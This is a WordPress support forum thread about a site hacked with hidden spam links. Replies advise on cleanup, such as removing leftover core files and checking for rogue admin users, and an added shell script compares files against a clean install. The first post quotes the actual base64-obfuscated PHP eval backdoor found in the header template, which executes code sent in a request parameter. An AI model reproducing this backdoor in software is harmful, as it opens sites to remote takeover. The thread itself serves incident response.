Hey Folks,

    About a month ago one of my sites was spammed or hacked. Google dropped me because the pages had a bunch of invisible links heading out to viagra, et al. I found what I thought was the source, deleted it, and changed my password, etc. Google lovingly welcomed me back. Yesterday I found the same hack again – I believe it included this:

    <?php /* obfuscated backdoor: the decoded string runs code supplied in a request parameter */ eval(base64_decode("aWYoQCRfUkVRVUVTVFsiQSJdID09ICJiIiBhbmQgaXNzZXQoJF9SRVFVRVNUWyJDIl0pKSBldmFsKHN0cmlwc2xhc2hlcyhzdHJpcHNsYXNoZXMoJF9SRVFVRVNUWyJDIl0pKSk7")); ?>

    sitting in the header template.

    There was also a file called:

    template-functions-comments.php

    on the site, and, last time, another, called:

    wp-functions.php

    in the includes folder. Are those spam files?

    That’s all the files I found, anyway.

    I upgraded to the newer wordpress versions today, so hopefully that problem won’t reoccur. Any further information or advice would be appreciated.

    Thank you.

    Cheers

    Carl

Viewing 15 replies - 1 through 15 (of 16 total)
    > I upgraded to the newer wordpress versions today

    Reading old posts, those users whose WP blogs have been cracked suggest that upgrading WP to the latest doesn’t necessarily stop the evil from cracking them again.

    You may want to destroy all administrative usernames and create a new one, giving it a nickname like ‘admin’ and changing admin display name to the nickname.

    Thread Starter walkinman

    (@walkinman)

    Hey macsoft,

    Thanks for the note. I’ll do that, for sure.

    Thank you.

    Cheers

    Carl

    Check to see if the malicious code isn’t in any theme file. Upgrading doesn’t help if you keep infected files.

    Thread Starter walkinman

    (@walkinman)

    Hey Gangleri,

    Well, after deleting the stuff that I found, the spam links appear to be gone .. but, and this is where some experienced folks might be better able to help, I don’t know if this is the kind of thing that needs to be re-injected to re-appear, or simply something that can be recalled from outside the site. It was appearing on every page before, and now I can’t find it on any of the ones I looked through.

    Thank you.

    Cheers

    Carl

    Well, I don’t have the experience (fortunately!), but when you search the forums a bit, you’ll find that in many cases some flaw is used to inject the theme with spamlinks. My advice is to get a “fresh copy” of the theme AND of the whole WP pack and of course change ALL passwords (and the username of the admin if you think they might have the passwords). Also make sure you don’t use a version of WP, a theme or a plugin that is vulnerable, and perhaps you want to have a look to see if there are no strange tables in the database or files anywhere on your server (maybe even outside of the WP folder if you have more).

    When all is back up, have a good look at this article and follow the tips.

    Thread Starter walkinman

    (@walkinman)

    Hey Gangleri,

    Thanks again. I’m using the WordPress Default theme, so if it’s flawed, WP have an issue, IMO. It could be a plugin, I suppose.

    I’ll check out the article, thanks so much.

    Cheers

    Carl

    > I’m using the WordPress Default theme, so if it’s flawed, WP have an issue, IMO.

    emphasis mine.

    In your opinion? That’s crap. Google’s cache of your site as of less than a week ago shows you were running 2.1.3

    http://74.125.95.104/search?q=cache:D3JDTW-aMboJ:www.skolaiimages.com/journal/+http://skolaiimages.com/journal/&hl=en&ct=clnk&cd=1&gl=us

    <meta name="generator" content="WordPress 2.1.3" /> <!-- leave this for stats -->

    You have been running an exploitable version of wordpress for well over a year, and while you indicated above that you were exploited a month ago, you admittedly continued to use that version?

    There’s the real flaw.

    Thread Starter walkinman

    (@walkinman)

    Hey whooami

    That’s precisely why I upgraded yesterday. I said that in my initial post. My reply was in response to the remark that some folks apparently have indicated that even with an upgrade, the injection continues. I don’t know if that’ll happen or not, and I admit I’m possibly the least knowledgeable person on these boards about such things, but if the upgrades don’t resolve a security problem, and the issue is related to the theme I’m running, then I’m not sure why my comment isn’t reasonable.

    I guess what I’m asking is that now that the spam links seem to be gone, does that mean the bad code is gone, or is it something that can be recalled from outside (assuming I’ve done all the necessary password changes, etc).

    Thanks.

    Cheers

    Carl

    For starters, I apologize, I misread what I quoted. I missed the “if”.

    Here’s the deal though, upgrading was a very wise move, no doubt. I can tell you, from experience, that that isn’t the end of the process though.

    Having cleaned out a number of previously exploited wordpress installs, it’s important to take a hard look at what files are on your site. Typically, people do this when they upgrade:

    they grab the zip, they unpack the files, and they upload those new files, right on top of the content that’s already there. That overwrites the wordpress files, sure — BUT, if there is a script that has been “hidden” inside, for instance, one of the many directories inside wp-includes/, that script is still there.

    When I clean out an exploited site, (and they typically need upgrades), I delete EVERYTHING except for the specific items mentioned in the codex (wp-config.php, etc..) before uploading the new wp files. That way, anything malicious is deleted.

    It’s also important to ensure that you don’t have any rogue users in your db, especially one named wordpress. You will NOT see that in your users list; you actually have to look in the database.

    Also, take a look at this link /wp-admin/options.php (on your own site).

    There are 2 values for an upload directory. Make sure neither of them points to anything like this ../../../tmp or anything similar.

    As for theme issues, a VERY early version of kubrick had one security issue, related to the search box code. That’s been fixed in later versions.

    Hope that helps.

    Thread Starter walkinman

    (@walkinman)

    Hey Whooami,

    Thanks.

    I’m looking over files on the site, but I don’t really know enough to know what I’m looking for.

    I looked at the db users, and didn’t see anything awry there. I also deleted the old admin user, created a new one with a new password and nickname.

    When I go to wp-admin/options.php on my site I get redirected to a login page, and it will not accept my password. I have to actually get a new one and try over .. and again, even logged in already, I get a redirect to login, and it won’t accept the password.

    In the wp-admin folder, I have 4 files starting with ‘upload’

    upload-functions.php —- 3/17/2007
    upload-js.php ———- 1/18/2007
    upload-rtl.css ———- 11/14/2006
    upload.css ————- 1/09/2007
    upload.php ————- 10/22/2008

    I’m trying to run this plug in security thing, but can’t seem to get far. I keep getting this:

    Make a backup of your database before using this tool:

    Change your database table prefix to mitigate zero-day SQL Injection attacks.

    Before running this script:

    wp-config must be set to writable before running this script.
    the database user you’re using with WordPress must have ALTER rights
    Change the current: prefix to something different if it’s the default wp_
    Allowed Chars are all latin Alphanumeric Chars as well as the Chars – and _.

    None of which I know what to do with.

    Sorry for my ignorance .. I can barely scrape a valid html page together, this stuff is a bit much for me.

    Thanks for your help.

    Cheers

    Carl

    Hi Carl,

    Here’s what worries me most about your last post:

    > In the wp-admin folder, I have 4 files starting with ‘upload’
    >
    > upload-functions.php —- 3/17/2007
    > upload-js.php ———- 1/18/2007
    > upload-rtl.css ———- 11/14/2006
    > upload.css ————- 1/09/2007
    > upload.php ————- 10/22/2008

    See those old timestamps? That suggests that your last upgrade was done the way I previously described. 🙁

    On a clean site, just overwriting files is marginally okay. I say that because one section of the codex indicates that’s “okay”. Fwiw, I can find another upgrade page on the codex that explicitly says to delete files first.

    My point is that you should not have, and especially in the case of a site that’s been exploited, files with old timestamps, except in the case of wp-config.php, themes, and plugins.

    The only exception to that would be if you used wget/fetch and upgraded all the files via the command line, in which case the timestamps inside the zip/tar would be preserved.

    If you look at the 2.1.x files, these 4 files:

    upload-functions.php —- 3/17/2007
    upload-js.php ———- 1/18/2007
    upload-rtl.css ———- 11/14/2006
    upload.css ————- 1/09/2007

    are all leftovers from your old install. In fact, you can confirm this by looking at a 2.6.2 zip: 2.6.2 doesn’t have the files inside wp-admin anymore.

    If this were MY site, I would systematically delete all the files in the core directories, except for your current theme, your plugins, and your wp-config.php, and then I would upload ALL fresh files. I would do this for the reason I already explained in my last post.
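One way to do the file check whooami describes (old-version leftovers and files WordPress never shipped, plus core files that differ from the distribution), as an added example that is not from this thread: it compares the installed tree against a freshly unpacked copy of the same WordPress version. It assumes POSIX sh with find and cmp on the server; the sample trees are constructed stand-ins, not real WordPress files.

```shell
#!/bin/sh
# Compare an installed WordPress tree against a freshly unpacked copy of the
# same version: files that the clean copy never shipped (leftovers from an
# older version, or files an intruder dropped) and core files whose content
# differs are the ones to delete or replace. Both trees must be local.

# Files present in the installed tree but absent from the clean one.
# wp-config.php and wp-content/ (themes, plugins, uploads) are skipped
# because they legitimately differ from the distribution.
list_extra_files() {
    clean="$1"; installed="$2"
    (cd "$installed" && find . -type f ! -path './wp-content/*' \
        ! -name 'wp-config.php' | sort) |
    while IFS= read -r f; do
        [ -e "$clean/$f" ] || printf '%s\n' "${f#./}"
    done
}

# Core files present in both trees whose content differs.
list_modified_files() {
    clean="$1"; installed="$2"
    (cd "$clean" && find . -type f ! -path './wp-content/*' | sort) |
    while IFS= read -r f; do
        if [ -e "$installed/$f" ] && ! cmp -s "$clean/$f" "$installed/$f"; then
            printf '%s\n' "${f#./}"
        fi
    done
}

# Constructed sample trees (stand-ins, not real WordPress files).
demo=$(mktemp -d)
for t in clean site; do
    mkdir -p "$demo/$t/wp-admin" "$demo/$t/wp-includes/js"
    echo '<?php // upload handler' > "$demo/$t/wp-admin/upload.php"
    echo 'var wp = {};' > "$demo/$t/wp-includes/js/wp.js"
done
mkdir -p "$demo/site/wp-content/themes/default"
echo '<?php // theme header' > "$demo/site/wp-content/themes/default/header.php"
echo 'define("DB_NAME", "x");' > "$demo/site/wp-config.php"
echo '<?php // 2.1-era leftover' > "$demo/site/wp-admin/upload-functions.php"
echo '<?php // not shipped by WordPress' > "$demo/site/wp-includes/wp-functions.php"
echo '// line appended to a core file' >> "$demo/site/wp-admin/upload.php"

EXTRA=$(list_extra_files "$demo/clean" "$demo/site")
MODIFIED=$(list_modified_files "$demo/clean" "$demo/site")
echo "Not shipped by this WordPress version:"; echo "$EXTRA"
echo "Core files that differ from the clean copy:"; echo "$MODIFIED"
rm -rf "$demo"
```

On a real site, point the two functions at the unpacked release zip and the web root; anything listed under the first heading is a candidate for deletion, anything under the second should be replaced from the clean copy.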

    Thread Starter walkinman

    (@walkinman)

    Hey Whooami

    Thanks for your help.

    Yeah, I did consider the time stamps. I wasn’t sure if they should all be new files, or if any of the older files still remain.

    I fear I actually did (probably) worse than you describe. I used an automated upgrade program.

    This one.

    It ran the upgrade for me, so I didn’t do much at all.

    When you say ‘core directories’, you mean wp-content, wp-admin, wp-includes, correct? Should I just go thru and delete all the files in those directories that are not dated 10-22-08 (excepting, of course, the theme, plugins and wp-config.php files)?

    Thanks, I appreciate your help.

    Cheers

    Carl

    > Should I just go thru and delete all the files in those directories that are not dated 10-22-08

    You can do that, yes. Where you might have trouble with that is inside wp-includes/js

    Again, were it me, I would delete everything in there, use an ftp client, and manually upload the files that belong there.

    I’ve stressed wp-includes/ several times now, because it’s turned out to be, more than once, the location of choice for rootshell scripts (malicious files), in sites that I’ve personally “de”-hacked.

    And yes, by core directories, I mean just what you said 🙂

    Thread Starter walkinman

    (@walkinman)

    hey Whooami

    Thanks for the help. I think I’ve got it OK now. A few troubles, but we’ll see how it goes. Everything’s working now, anyway.

    And now I’ve got a note that says to upgrade yet again. 🙂

    So, while you’re here, should I not use the auto-upgrade thing, but just upload all the core files manually?

    Thanks so much.

    Cheers

    Carl

    > but just upload all the core files manually?

    Just upload the 2 files 🙂 — even easier.

The topic ‘Spammed/hacked???’ is closed to new replies.